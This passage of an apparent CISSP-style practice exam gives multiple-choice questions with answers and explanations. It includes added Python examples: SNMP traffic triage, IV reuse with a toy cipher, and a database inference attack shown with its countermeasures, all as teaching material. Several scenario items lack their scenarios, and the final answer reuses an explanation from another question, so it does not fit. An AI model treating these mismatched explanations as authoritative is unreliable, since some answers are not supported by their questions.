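    """Return (version, community, pdu_name) for an SNMPv1/v2c message, else None."""
    try:
        tag, body, _ = read_tlv(packet, 0)
        if tag != TAG_SEQUENCE:
            return None
        tag, ver, pos = read_tlv(body, 0)
        version = int.from_bytes(ver, "big")
        if tag != TAG_INTEGER or version not in (0, 1):   # 3 = SNMPv3, no plaintext community
            return None
        tag, community, pos = read_tlv(body, pos)
        if tag != TAG_OCTET_STRING:
            return None
        pdu_tag, _, _ = read_tlv(body, pos)
    except IndexError:                      # truncated or malformed datagram
        return None
    return version, bytes(community), PDU_NAMES.get(pdu_tag, "unknown(0x%02x)" % pdu_tag)


def triage(src_ip, packet, trusted_nets=("10.0.0.0/8", "192.168.0.0/16")):
    """Findings for one inbound datagram to UDP/161 (trusted ranges are an assumption)."""
    parsed = parse_snmp(packet)
    if parsed is None:
        return ["not a parseable SNMPv1/v2c message"]
    version, community, pdu = parsed
    src = ipaddress.ip_address(src_ip)
    findings = []
    if not any(src in ipaddress.ip_network(net) for net in trusted_nets):
        findings.append("SNMPv%s request from untrusted source %s" % ("1" if version == 0 else "2c", src_ip))
    if community in DEFAULT_COMMUNITIES:
        findings.append("default community string %r" % community.decode())
    if pdu == "SetRequest":
        findings.append("SetRequest: write to the MIB (device reconfiguration attempt)")
    return findings


if __name__ == "__main__":
    pkt = build_request(b"private", "1.3.6.1.2.1.1.5.0", pdu_tag=0xA3)   # constructed SetRequest
    print(parse_snmp(pkt))
    for finding in triage("203.0.113.7", pkt):
        print("ALERT:", finding)
```

The same parser returns None for an SNMPv3 message, which is the point: with v3 the community string is gone and an analyst has to look at the user-based security model instead. Filtering inbound UDP/161 at the border remains the control that actually removes the exposure.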

Which of the following best describes an item the software development team needs to address to ensure that drivers cannot be loaded in an unauthorized manner? A. Improved security kernel processes B. Improved security perimeter processes C. Improved application programming interface processes D. Improved garbage collection processes

A. If device drivers can be loaded improperly, then either the access control rules outlined within the reference monitor need to be improved upon or the current rules need to be better enforced through the security kernel processes. Only authorized subjects should be able to install sensitive software components that run within ring 0 of a system.

Tom has been told that he has to reduce staff from the help-desk team. Which of the following technologies can help with the company's help-desk budgetary issues? A. Self-service password support B. RADIUS implementation C. Reduction of authoritative IdM sources D. Implement a role-based access control model

A. If help-desk staff are spending too much time resetting passwords, then a technology should be implemented to reduce the amount of time paid staff spend on this task. The more tasks that can be automated through technology, the less that has to be spent on staff. The following password management functions are included in most IdM products. Password synchronization: reduces the complexity of keeping up with different passwords for different systems. Self-service password reset: reduces help-desk call volumes by allowing users to reset their own passwords. Assisted password reset: shortens the help desk's resolution process for password issues, and may include verifying the user with other authentication mechanisms (biometrics, tokens).

A company that wishes to maximize data writing efficiency should ____. A. Implement data striping. B. Upsize disk drives. C. limit user access. D. Mirror critical drives.

A. Implement data striping. Striping (RAID 0) splits each write across several disks so they work in parallel, which raises write throughput; on its own it adds no redundancy, so the failure of any one disk loses the whole set. Mirroring (RAID 1) protects the data but costs an extra write for every write.

Which of the following describes a parallel test during disaster recovery testing? A. It is performed to ensure that some systems will run at the alternate site. B. All departments receive a copy of the disaster recovery plan to review it for completeness. C. Representatives from each department come together and go through the test collectively. D. Normal operations are shut down.

A. In a parallel test, some systems are run at the alternate site and results are compared with how processing takes place at the primary site. This is to ensure the systems work at the alternate site and productivity is not affected. This also extends the previous test and allows the team to walk through the steps of setting up and configuring systems at the offsite facility.

Which could be considered a single point of failure within a single sign-on implementation? A. Authentication server B. User's workstation C. Logon credentials D. RADIUS

A. In a single sign-on technology, all users are authenticating to one source. If that source goes down, authentication requests cannot be processed.

Which of the following correctly best describes an object-oriented database? A. When application queries for data, it receives both the data and the procedure. B. It is structured similarly to a mesh network for redundancy and fast data retrieval. C. Subjects must have knowledge of the well-defined access path in order to access data. D. The relationships between data entities provide the framework for organizing data.

A. In an object-oriented database, objects are instantiated when needed, and the data and procedure (called method) go with the object when it is requested. This differs from a relational database, in which the application uses its own procedures to obtain and process data when retrieved from the database.

Which of the following best describes the role of the values that is allowing for patterns as described in the scenario? A. Initialization vector B. One-time password C. Master symmetric key D. Subkey

A. Initialization vectors (IVs) are random values that are used with algorithms to ensure patterns are not created during the encryption process. They are used with keys and do not need to be encrypted when being sent to the destination, but each IV must be used only once under a given key (and, for CBC mode, must be unpredictable). If IVs are not used, or the same IV is reused with the same key, then two identical plaintext values encrypted with the same key will produce the same ciphertext. Providing attackers with these types of patterns can make their job easier in breaking the encryption method and uncovering the key.
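
An added example to make the pattern leak concrete; it is not code from the original page. To stay dependency-free it uses a toy 16-byte Feistel block cipher whose round function is SHA-256, which is an assumption made for illustration only (use AES from a real library in practice). The block cipher is a stand-in; what the example shows is the CBC chaining, the IV handling and the resulting ciphertext patterns: identical plaintext blocks are visible under ECB, hidden under CBC with a random IV, and visible again as identical whole ciphertexts when an IV is reused.

```python
"""Why an IV matters: same plaintext, same key -> same ciphertext, unless a fresh IV
randomises the chaining. Added example; the Feistel cipher is a toy stand-in for AES."""
import hashlib
import os

BLOCK = 16
ROUNDS = 8


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    """Keyed round function: SHA-256(key || round || half) truncated to 8 bytes."""
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, block):
    """Toy Feistel network (illustrative only, not for production use)."""
    left, right = block[:8], block[8:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round(key, i, right))
    return right + left                       # final swap


def block_decrypt(key, block):
    right, left = block[:8], block[8:]        # undo the final swap
    for i in reversed(range(ROUNDS)):
        right, left = left, _xor(right, _round(key, i, left))
    return left + right


def pad(data):
    """PKCS#7 padding to a multiple of the block size."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    return data[:-data[-1]]


def blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, plaintext):
    """No IV, no chaining: identical plaintext blocks give identical ciphertext blocks."""
    return b"".join(block_encrypt(key, b) for b in blocks(pad(plaintext)))


def cbc_encrypt(key, iv, plaintext):
    """CBC: each block is XORed with the previous ciphertext block (the IV for the first)."""
    prev, out = iv, []
    for b in blocks(pad(plaintext)):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, []
    for c in blocks(ciphertext):
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return unpad(b"".join(out))


def demo(key, plaintext):
    """Summarise what an observer sees: repeated ciphertext blocks under ECB, none under
    CBC with a random IV, and identical ciphertexts when the IV is reused."""
    ecb = blocks(ecb_encrypt(key, plaintext))
    iv = os.urandom(BLOCK)                    # fresh, unpredictable IV
    first = cbc_encrypt(key, iv, plaintext)
    cbc = blocks(first)
    return {
        "ecb_repeated_blocks": len(ecb) - len(set(ecb)),
        "cbc_repeated_blocks": len(cbc) - len(set(cbc)),
        "cbc_same_iv_identical": cbc_encrypt(key, iv, plaintext) == first,
        "cbc_fresh_iv_identical": cbc_encrypt(key, os.urandom(BLOCK), plaintext) == first,
    }


if __name__ == "__main__":
    # Constructed input: three identical 16-byte blocks, the worst case for ECB
    for k, v in demo(b"example-key-0001", b"ATTACK AT DAWN!!" * 3).items():
        print(k, v)
```

The IV travels in the clear alongside the ciphertext; secrecy is not what it provides. Its job is uniqueness, which is why counter-derived or random IVs are fine and a fixed IV is not.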

Both de facto and proprietary interior protocols are in use today. Which of the following is a proprietary interior protocol that chooses the best path between the source and destination? A. IGRP B. RIP C. BGP D. OSPF

A. Interior Gateway Routing Protocol (IGRP) is a distance-vector routing protocol that was developed by, and is proprietary to, Cisco Systems. Whereas Routing Information Protocol (RIP) uses one criterion to find the best path between the source and the destination, IGRP uses five criteria to make a "best route" decision. A network administrator can set weights on these different metrics so that the protocol works best in that specific environment.

A small medical institution's IT security team has become overwhelmed with having to operate and maintain IDSs, firewalls, enterprise-wide antimalware solutions, data leak prevention technologies, and centralized log management. Which of the following best describes what type of solution this organization should implement to allow for standardized and streamlined security operations? A. Unified threat management B. Continuous monitoring technology C. Centralized access control systems D. Cloud-based security solution

A. It has become very challenging to manage the long laundry list of security solutions almost every network needs to have in place. The list includes, but is not limited to, firewalls, antimalware, antispam, IDS/IPS, content filtering, data leak prevention, VPN capabilities, and continuous monitoring and reporting. Unified threat management (UTM) appliance products have been developed that provide all (or many) of these functionalities in a single network appliance. The goals of UTM are simplicity, streamlined installation and maintenance, centralized control, and the ability to understand a network's security from a holistic point of view. Each security product vendor has its own UTM solution, but each has similar goals of allowing administrators to monitor and manage a variety of security-related applications and products through a single management console.

Which of the following best describes "on-premises" identity management (IdM)? A. It is an architecture for managing all users' identities and authentications whereby the resources for doing so are constructed, installed, and maintained under the enterprise's physical control, including all the necessary hardware and software. B. It is an architecture for managing all users' identities and authentications whereby the resources for doing so are installed, configured, and maintained by a solution provider. C. It is a solution for managing user identities and authentications for Internet-based users who need access to internal, on-premises corporate resources. D. It is a solution for managing on-premises user identities and authentications for access to external, Internet-based resources.

A. It is an architecture for managing all users' identities and authentications whereby the resources for doing so are constructed, installed, and maintained under the enterprise's physical control, including all the necessary hardware and software.

Packet-switching infrastructures are safer environments because ____. A. It is harder to sniff traffic since the computers have virtual private connections. B. They are just as unsafe as non-switched environments. C. The data link encryption does not permit wire-tapping. D. Switches are more intelligent than bridges and implement security mechanisms.

A. It is harder to sniff traffic since the computers have virtual private connections. A switch forwards a unicast frame only to the port where the destination MAC address was learned, so a passive sniffer on another port does not see it, unlike a hub or shared medium. "Harder" is not "impossible": ARP spoofing, MAC flooding (which forces the switch to fail open and flood), or a misconfigured mirror/SPAN port all put the traffic back in front of an attacker.

Which of the following is an industry standard for providing repositories for security-related data, such as cryptographic keys, passwords, or user IDs? A. LDAP B. CHAP C. PKI D. SNMP

A. LDAP

Which is not true of polycarbonate acrylic windows? A. Less resistant to breakage than standard plate windows. B. Produces toxic flames if burned C. Can be cut, sawed, or drilled D. Provides more protection than standard acrylic windows.

A. Less resistant to breakage than standard plate windows.

The operating system access controls comprise which of the following? A. Logical controls B. Physical controls C. Administrative controls D. Compensating controls

A. Logical controls

Which of the following is true of management reviews? A. They happen periodically and include results of audits as a key input. B. They happen in an ad hoc manner as the needs of the organization dictate. C. They are normally conducted by mid-level managers, but their reports are presented to the key business leaders. D. They are focused on assessing the management of information systems.

A. Management reviews work best when they are regularly scheduled events involving the key organizational leaders, because this allows the subordinate leaders to plan and conduct the assessments, such as audits that provide inputs to the review.

Which of the following is not a true statement about CCTV lenses? A. Lenses that have a manual iris should be used in outside monitoring. B. Zoom lenses will carry out focus functionality automatically. C. Depth of field increases as the size of the lens opening decreases. D. Depth of field increases as the focal length of the lens decreases.

A. Manual iris lenses have a ring around the CCTV lens that can be manually turned and controlled. A lens that has a manual iris would be used in an area that has fixed lighting, since the iris cannot self-adjust to changes of light. An auto iris lens should be used in environments where the light changes, such as an outdoor setting. As the environment brightens, this is sensed by the iris, which automatically adjusts itself. Security personnel will configure the CCTV to have a specific fixed exposure value, which the iris is responsible for maintaining. The other answers are true.

Mark works for a large corporation operating in multiple countries worldwide. He is reviewing his company's policies and procedures dealing with data breaches. Which of the following is an issue that he must take into consideration? A. Each country may or may not have unique notification requirements. B. All breaches must be announced to affected parties within 24 hours. C. Breach notification is a "best effort" process and not a guaranteed process. D. Breach notifications are avoidable if all PII is removed from data stores.

A. Many (but not all) countries have data breach notification requirements, and these vary greatly in their specifics. While some countries have very strict requirements, others have more lax requirements, or lack them altogether. This requires the security professional to ensure compliance in each territory where the company operates. Applying the most stringent rules universally (e.g., 24-hour notification) is usually not a good idea from a business perspective. The term "best effort" is not acceptable in countries with strict rules, nor is the notion that personally identifiable information (PII) is the only type of data that would trigger a mandatory notification.

Which item is not part of a Kerberos authentication implementation? A. Message authentication code B. Ticket granting service C. Authentication service D. Users, programs, and services

A. Message authentication code (MAC) is a cryptographic function and is not a key component of Kerberos. Kerberos is made up of a KDC, a realm of principals (users, services, applications, and devices), an authentication service, tickets, and a ticket granting service. Kerberos messages do use keyed checksums internally for integrity, but a MAC is a cryptographic primitive, not one of the architectural components the exam expects you to name.

Suppose you want to study the actions an adversary may attempt against your system and test the effectiveness of the controls you have emplaced to mitigate the associated risks. Which of the following approaches would best allow you to accomplish this goal? A. Misuse case testing B. Use case testing C. Real user monitoring (RUM) D. Fuzzing

A. Misuse case testing allows us to document both an adversary's desired actions on a system and the controls that are meant to thwart that adversary. It is similar to developing use cases, but with a malicious user's actions in mind instead of those of legitimate users.

Which of the following is not a result of a penetration test? A. Modify access control permissions B. Identify network vulnerabilities C. Evaluates IDS effectiveness D. Evaluate incident response procedures.

A. Modify access control permissions

Virtual storage combines RAM and secondary storage for system memory. Which of the following is a security concern pertaining to virtual storage? A. More than one process uses the same resource. B. It allows cookies to remain persistent in memory. C. It allows for side-channel attacks to take place. D. Two processes can carry out a denial of service.

A. More than one process uses the same resource.

Which of the following is the best description of directories that are used in identity management technology? A. Most are hierarchical and follow the X.500 standard. B. Most have a flat architecture and follow the X.400 standard. C. Most have moved away from LDAP. D. Many use LDAP.

A. Most enterprises have some type of directory that contains information pertaining to the company's network resources and users. Most directories follow a hierarchical database format, based on the X.500 standard, and a type of protocol, as in Lightweight Directory Access Protocol (LDAP), that allows subjects and applications to interact with the directory. Applications can request information about a particular user by making an LDAP request to the directory, and users can request information about a specific resource by using a similar request.

Many applications are able to transmit over one physical medium at the same time by the use of ____. A. Multiplexing. B. Routing. C. Forwarding. D. Asynchronous protocols.

A. Multiplexing.

Which of the following antimalware detection methods is the most recent to the industry and monitors suspicious code as it executes within the operating system? A. Behavior blocking B. Fingerprint detection C. Signature-based detection D. Heuristic detection

A. Of the methods listed, behavior blocking is the most recent evolution in antimalware detection. Behavior blocking allows suspicious code to execute within the operating system and watches its interactions looking for suspicious activities. These activities include writing to startup files or the Run keys in the Registry; opening, deleting, or modifying files; scripting e-mail messages to send executable code; and creating or modifying macros and scripts. If the antimalware program detects some of these potentially malicious activities, it can terminate the software and provide a message to the user. A drawback to behavior blockers is that the malicious code must actually execute in real time. This type of constant monitoring also requires a high level of system resources.

Charlie uses PGP on his Linux-based e-mail client. His friend Dave uses S/MIME on his Windows-based e-mail. Charlie is unable to send an encrypted e-mail to Dave. What is the likely reason? A. PGP and S/MIME are incompatible. B. Each has a different secret key. C. Each is using a different CA. D. There is not enough information to determine the likely reason.

A. PGP (OpenPGP) and S/MIME (based on CMS) use different message formats and, just as importantly, different trust models: PGP uses a decentralized web of trust for its PKI, while S/MIME relies on centralized CAs and X.509 certificates. The two systems are, therefore, incompatible with each other unless one side installs a client or plug-in that speaks the other's format.

On a Tuesday morning, Jami is summoned to the office of the security director, where she finds six of her peers from other departments. The security director gives them instructions about an event that will be taking place in two weeks. Each of the individuals will be responsible for removing specific systems from the facility, bringing them to the offsite facility, and implementing them. Each individual will need to test the installed systems and ensure the configurations are correct for production activities. What event is Jami about to take part in? A. Parallel test B. Full-interruption test C. Simulation test D. Structured walk-through test

A. Parallel tests are similar to simulation tests, except that parallel tests include moving some of the systems to the offsite facility. Simulation tests stop just short of the move. Parallel tests are effective because they ensure that specific systems work at the new location, but the test itself does not interfere with business operations at the main facility.

Which of the following techniques or set of techniques is used to deter database inference attacks? A. Partitioning, cell suppression, and noise and perturbation B. Controlling access to the data dictionary C. Partitioning, cell suppression, and small query sets D. Partitioning, noise and perturbation, and small query sets

A. Partitioning means to logically split the database into parts. Views then dictate which users can view specific parts. Cell suppression means that specific cells are not viewable by certain users. And noise and perturbation is when bogus information is inserted into the database to try to give potential attackers incorrect information.
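
An added example, not code from the original page, showing why these controls exist. An attacker who is allowed only aggregate queries can still recover one person's salary by differencing two sums (a "tracker" attack). The code then applies the three countermeasures named in the answer: a query set size threshold (cell suppression, which must also check the complement of the query set), noise derived from the query set itself so that repeating the query cannot average the noise away, and a partitioned view that prevents cross-partition queries from being formed at all. The employee table is constructed sample data, and the k threshold and noise scale are assumptions.

```python
"""Database inference: a differencing attack on aggregates, and the three
countermeasures layered on top. Added example; the table is constructed data."""
import random

# Constructed sample table: (name, department, salary)
EMPLOYEES = [
    ("alice", "eng", 120000),
    ("bob", "eng", 95000),
    ("carol", "eng", 105000),
    ("dave", "ops", 70000),
    ("erin", "ops", 72000),
    ("frank", "sales", 64000),
]


def salary_sum(rows, where):
    """Uncontrolled aggregate query: SUM(salary) over rows for which where(row) holds."""
    return sum(r[2] for r in rows if where(r))


def inference_attack(rows, target):
    """Differencing (tracker) attack: two aggregates, neither of which names the target alone."""
    everyone = salary_sum(rows, lambda r: True)
    everyone_but_target = salary_sum(rows, lambda r: r[0] != target)
    return everyone - everyone_but_target


def suppressed_sum(rows, where, k=3):
    """Cell suppression / query set size control: refuse an aggregate whose query set
    holds fewer than k rows, or whose complement does (otherwise the attacker simply
    asks for the complement and subtracts from the total)."""
    n = sum(1 for r in rows if where(r))
    if n < k or len(rows) - n < k:
        return None
    return salary_sum(rows, where)


def perturbed_sum(rows, where, scale=5000):
    """Noise and perturbation: add noise seeded by the query set itself, so repeating the
    same query returns the same perturbed value and cannot be averaged away."""
    matched = sorted(r[0] for r in rows if where(r))
    rng = random.Random("|".join(matched))    # deterministic per query set
    return salary_sum(rows, where) + int(rng.gauss(0, scale))


def partition_view(rows, department):
    """Partitioning: a view that exposes only one department. A query that spans
    partitions (all employees minus one) cannot be expressed against this view."""
    return [r for r in rows if r[1] == department]


def defended_sum(rows, where, k=3):
    """Layer the controls: suppress small (or near-complete) query sets, then perturb."""
    if suppressed_sum(rows, where, k) is None:
        return None
    return perturbed_sum(rows, where)


if __name__ == "__main__":
    print("recovered by differencing:", inference_attack(EMPLOYEES, "alice"))
    print("same query, suppressed:", defended_sum(EMPLOYEES, lambda r: r[0] != "alice"))
    print("eng total, perturbed:", defended_sum(EMPLOYEES, lambda r: r[1] == "eng"))
```

A size threshold alone is known to be beatable with more elaborate tracker queries, which is why noise and partitioning are layered on rather than chosen instead; the trade-off is that every layer makes legitimate statistical answers a little less useful.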

Which of the following is a directive issued by senior management that identifies goals, measurements, and responsibilities? A. Policy B. Procedure C. Standard. D. baseline.

A. Policy.

Which of the following is currently the most recommended water system for a computer room? A. Preaction B. Wet pipe C. Dry pipe D. Deluge.

A. Preaction

In secure computing systems, why is there a logical form of separation used between processes? A. Processes are contained within their own security domains so each does not make unauthorized accesses to other processes or their resources. B. Processes are contained within their own security perimeter so they can only access protection levels above them. C. Processes are contained within their own security perimeter so they can only access protection levels equal to them. D. The separation is hardware and not logical in nature.

A. Processes are contained within their own security domains so each does not make unauthorized accesses to other processes or their resources.

Under which of the following models are rights implicitly assigned? A. RBAC. B. DAC. C. MAC. D. Rule-based.

A. RBAC.

What is an advantage of RSA over DSA? A. It can provide digital signature and encryption functionality. B. It uses fewer resources and encrypts faster because it uses symmetric keys. C. It is a block cipher rather than a stream cipher. D. It employs a one-time encryption pad.

A. RSA can be used for data encryption, key exchange, and digital signatures. DSA can be used only for digital signatures.

Use the following scenario to answer Questions 141-142. Ron is in charge of updating his company's business continuity and disaster recovery plans and processes. After conducting a business impact analysis, his team has told him that if the company's e-commerce payment gateway was unable to process payments for 24 hours or more, this could drastically affect the survivability of the company. The analysis indicates that after an outage, the payment gateway and payment processing should be restored within 13 hours. Ron's team needs to integrate solutions that provide redundancy, fault tolerance, and failover capability. In the scenario, what does the 24-hour time period represent and what does the 13-hour time period represent? A. Maximum tolerable downtime, recovery time objective B. Recovery time objective, maximum tolerable downtime C. Maximum tolerable downtime, recovery data period D. Recovery time objective, data recovery period

A. RTO is an allowable amount of downtime, and the MTD is a time period that represents the inability to recover. The RTO value is smaller than the MTD value because the MTD value represents the time after which an inability to recover significant operations will mean severe and perhaps irreparable damage to the organization's reputation or bottom line. The RTO assumes that there is a period of acceptable downtime. This means that a company can be out of production for a certain period of time (RTO) and still get back on its feet. But if the company cannot get production up and running within the MTD window, the company is sinking too fast to properly recover.

Monica is the IT director of a large printing press. She has been made aware of several brute-force password attack attempts within the past weeks. Which of the following reactions would suit Monica best? A. Reduce clipping level. B. Find a more effective encryption mechanism. C. Increase employee awareness through warning banners and training. D. Implement spyware protection that is integrated into the current antivirus product.

A. Reduce the clipping level.

Which of the following best describes the mitigation of data remanence by an overwriting process? A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's B. Converting the 1's and 0's that represent data with the output of a cryptographic function C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes D. Exposing storage media to caustic or corrosive chemicals that render it unusable

A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's

Business continuity management means taking the necessary steps to increase a company's _____ to service disruption. A. resilience B. perceived reaction C. attitude D. means.

A. Resilience.

A rule-based IDS takes a different approach than a signature-based or anomaly-based system. Which of the following is characteristic of a rule-based IDS? A. Uses IF/THEN programming within expert systems B. Identifies protocols used outside of their common bounds C. Compares patterns to several activities at once D. Can detect new attacks

A. Rule-based intrusion detection is commonly associated with the use of an expert system. An expert system is made up of a knowledge base, an inference engine, and rule-based programming. Knowledge is represented as rules, and the data to be analyzed is referred to as facts. The knowledge of the system is written in rule-based programming (IF situation THEN action). These rules are applied to the facts, the data that comes in from a sensor, or a system that is being monitored. For example, an IDS pulls data from a system's audit log and stores it temporarily in its fact database. Then, the preconfigured rules are applied to this data to indicate whether anything suspicious is taking place. In our scenario, the rule states "IF a root user creates File1 AND creates File2 SUCH THAT they are in the same directory THEN there is a call to Administrative Tool TRIGGER send alert." This rule has been defined such that if a root user creates two files in the same directory and then makes a call to a specific administrative tool, an alert should be sent.

Use the following scenario to answer Questions 27-29. John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company's knowledge. Along with this issue, his team has also found out that two DNS servers had no record replication restrictions put into place, and the servers have been caching suspicious name resolution data. Which of the following is the best countermeasure to put into place to help reduce the threat of network sniffers viewing network management traffic? A. SNMP v3 B. L2TP C. CHAP D. Dynamic packet-filtering firewall

A. SNMP versions 1 and 2 send their community string values in cleartext, but with version 3, cryptographic functionality has been added, which provides encryption, message integrity, and authentication security. So the sniffers that are installed on the network cannot sniff SNMP traffic.

Which of the following correctly describes the relationship between SSL and TLS? A. TLS is the open-community version of SSL. B. SSL can be modified by developers to expand the protocol's capabilities. C. TLS is a proprietary protocol, while SSL is an open-community protocol. D. SSL is more extensible and backward compatible with TLS.

A. Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic protocols that are used to secure communications by encrypting segments of network connections. Both protocols work at the session layer of IPv4, though (ISC)2 considers them presentation layer protocols because they provide encryption. TLS is the open-community version of SSL. Because TLS is an open-community protocol, its specifications can be modified by vendors within the community to expand what it can do and what technologies it can work with. SSL is a proprietary protocol, and TLS was developed by a standards body, making it an open-community protocol.

Pertaining to the CEO's security concerns, what should Lenny suggest the company put into place? A. Security event management software, an intrusion prevention system, and behavior-based intrusion detection B. Security information and event management software, an intrusion detection system, and signature-based protection C. An intrusion prevention system, security event management software, and malware protection D. An intrusion prevention system, security event management software, and war-dialing protection

A. Security event management software allows for network traffic to be viewed holistically by gathering log data centrally and analyzing it. The intrusion prevention system allows for proactive measures to be put into place to help in stopping malicious traffic from entering the network. Behavior-based intrusion detection can identify new types of attacks (zero day) compared to signature-based intrusion detection.

What is the difference between security training and security awareness training? A. Security training is focused on skills, while security awareness training is focused on recognizing and responding to issues. B. Security training must be performed, while security awareness training is an aspirational goal. C. Security awareness training is focused on security personnel, while security training is geared toward all users. D. There is no difference. These terms refer to the same process.

A. Security training is the process of teaching a skill or set of skills that will allow people to better perform specific functions. Security awareness training, on the other hand, is the process of exposing people to security issues so that they may be able to recognize them and better respond to them. Security training is typically provided to security personnel, while security awareness training should be provided to every member of the organization.

Since sending spam (unwanted messages) has increased over the years and e-mail has become a common way of sending out malicious links and malware, the industry has developed different ways to combat these issues. One approach is to use a Sender Policy Framework, which is an e-mail validation system. In the following graphic, what type of system receives the request in step 2 and replies in step 3? A. DNS server B. E-mail server C. RADIUS server D. Authentication server

A. Sender Policy Framework (SPF) is an e-mail validation system designed to prevent spam and malicious e-mail by detecting e-mail spoofing. Attackers commonly spoof e-mail addresses to try and fool the receiver into thinking that the message came from a known and trusted source. SPF allows network administrators to specify which hosts are allowed to send mail from a given domain by implementing an SPF record in the Domain Name System (DNS). The e-mail server is configured to check with the DNS server to verify that an e-mail coming from a specific domain was sent from an IP address that has been sanctioned by the sending domain's administrator. In the graphic, step 2 is the e-mail server sending this validation request to a DNS server, and step 4 illustrates the resulting validation process that is followed.

Which factor is the most important item when it comes to ensuring security is successful in an organization? A. Senior management support B. Effective controls and implementation methods C. Updated and relevant security policies and procedures D. Security awareness by all employees

A. Senior management support

If the financial institution wants to force collusion to take place for fraud to happen successfully in this situation, what should Todd put into place? A. Separation of duties B. Rotation of duties C. Social engineering D. Split knowledge

A. Separation of duties

____________________ provides a machine-readable description of the specific operations provided by a specific web service. ____________________ provides a method for web services to be registered by service providers and located by service consumers. A. Web Services Description Language; Universal Description, Discovery and Integration B. Universal Description, Discovery and Integration; Web Services Description Language C. Web Services Description Language; Simple Object Access Protocol D. Simple Object Access Protocol; Universal Description, Discovery and Integration

A. Services within a service-oriented architecture (SOA) are usually provided through web services. A web service allows for web-based communication to happen seamlessly using web-based standards as in Simple Object Access Protocol (SOAP), HTTP, Web Services Description Language (WSDL), Universal Description, Discovery and Integration (UDDI), and Extensible Markup Language (XML). WSDL provides a machine-readable description of the specific operations provided by the service. UDDI is an XML-based registry that lists available services. UDDI provides a method for services to be registered by service providers and located by service consumers.

A disaster recovery procedure involving all affected departments acting out a specific scenario, but which does not go to an off-site facility, is referred to as: A. Simulation test. B. Structured walk-through test. C. Checklist test. D. Parallel test.

A. Simulation Test.

Which of the following statements is true with respect to preventing and/or detecting security disasters? A. Information security continuous monitoring (ISCM), defined by NIST Special Publication 800-137 as maintaining an ongoing awareness of your current security posture, vulnerabilities, and threats, is the best way to facilitate sound risk management decisions. B. Whitelisting allowed executables or, barring that, blacklisting known bad ones is the only effective means of preventing malware from compromising systems and causing a serious security breach. C. A rigorous regime of vulnerability and patch management can effectively eliminate the risk of known malware compromising critical corporate systems. D. By aggregating and correlating asset data and the security events concerning them, the deployment of a security information and event management (SIEM) system is the best way to ensure that attacks can be properly dealt with before they result in disaster.

A. Sound risk management is impossible without a thoroughgoing and current understanding of the effectiveness of the deployed controls vis-à-vis the current threats to extant vulnerabilities in the enterprise. Information security continuous monitoring (ISCM) seeks to provide this information on a truly ongoing basis, recognizing that new vulnerabilities are not discovered, nor do new threats to them emerge, on a quarterly basis. Rather, an agile and timely approach is needed to continuously ascertain, via heavy use of metrics and automation, how prepared we actually are, and how we can continuously improve our resilience to expected adversarial tactics, techniques, and procedures (TTPs).

Which of the following works similarly to stream ciphers? A. One-time pad B. AES C. Block D. RSA

A. Stream ciphers were developed to provide the same type of protection one-time pads do, which is why they work in such a similar manner. In practice, however, stream ciphers cannot provide the level of protection one-time pads do, but because stream ciphers are implemented through software and automated means, they are much more practical. A one-time pad is a perfect encryption scheme because it is considered unbreakable if implemented properly. This cipher uses a pad made up of random values. A plaintext message that needs to be encrypted is converted into bits, and a one-time pad is made up of random bits. This encryption process uses a binary mathematical function called exclusive-OR, usually abbreviated as XOR. XOR is an operation that is applied to two bits and is a function commonly used in binary mathematics and encryption methods. Stream ciphers also encrypt at the bit level, which is how they are similar to one-time pad encryption schemes.

Why are switched infrastructures safer environments than routed networks? A. It is more difficult to sniff traffic since the computers have virtual private connections. B. They are just as unsafe as nonswitched environments. C. The data link encryption does not permit wiretapping. D. Switches are more intelligent than bridges and implement security mechanisms.

A. Switched environments use switches to allow different network segments and/or systems to communicate. When this communication takes place, a virtual connection is set up between the communicating devices. Since it is a dedicated connection, broadcast and collision data are not available to other systems, as in an environment that uses only bridges and routers.

Which of the following is a true difference between an asymmetric and a symmetric algorithm? A. Symmetric algorithms are faster because they use substitution and transposition. B. Asymmetric algorithms are slower because they use substitution and transposition. C. Asymmetric algorithms are best implemented in hardware and symmetric in software. D. Asymmetric algorithms are more vulnerable to frequency analysis attacks.

A. Symmetric algorithms are faster because they use substitution and transposition.

Most operating systems and applications allow administrators to configure the data that will be captured in audit logs for security purposes. Which of the following is the least important item to be captured in audit logs? A. System performance output data. B. Last user who accessed the device. C. Number of unsuccessful access attempts. D. Number of successful access attempts.

A. System performance output data.

There are several different types of authentication technologies. Which type is being shown in the graphic that follows? A. 802.1X B. Extensible Authentication Protocol C. Frequency hopping spread spectrum D. Orthogonal frequency-division multiplexing

A. The 802.1X standard is a port-based network access control that ensures a user cannot make a full network connection until he is properly authenticated. This means a user cannot access network resources and no traffic is allowed to pass, other than authentication traffic, from the wireless device to the network until the user is properly authenticated. An analogy is having a chain on your front door that enables you to open the door slightly to identify a person who knocks before you allow him to enter your house. User authentication provides a higher degree of confidence and protection than system authentication.

John has been told that one of the applications installed on a web server within the DMZ accepts any length of information that a customer using a web browser inputs into the form the web server provides to collect new customer data. Which of the following describes an issue that John should be aware of pertaining to this type of vulnerability? A. Application is written in the C programming language. B. Application is not carrying out enforcement of the trusted computing base. C. Application is running in ring 3 of a ring-based architecture. D. Application is not interacting with the memory manager properly.

A. The C language is susceptible to buffer overflow attacks because it allows for direct pointer manipulations to take place. Specific commands can provide access to low-level memory addresses without carrying out bounds checking.

Which of the following best describes some of the issues that the evaluation testers most likely ran into while testing the submitted product? A. Nonprotected ROM sections B. Vulnerabilities that allowed malicious code to execute in protected memory sections C. Lack of a predefined and implemented trusted computing base D. Lack of a predefined and implemented security kernel

A. The C language is susceptible to buffer overflow attacks because it allows for direct pointer manipulations to take place. Specific commands can provide access to low-level memory addresses without carrying out bounds checking.

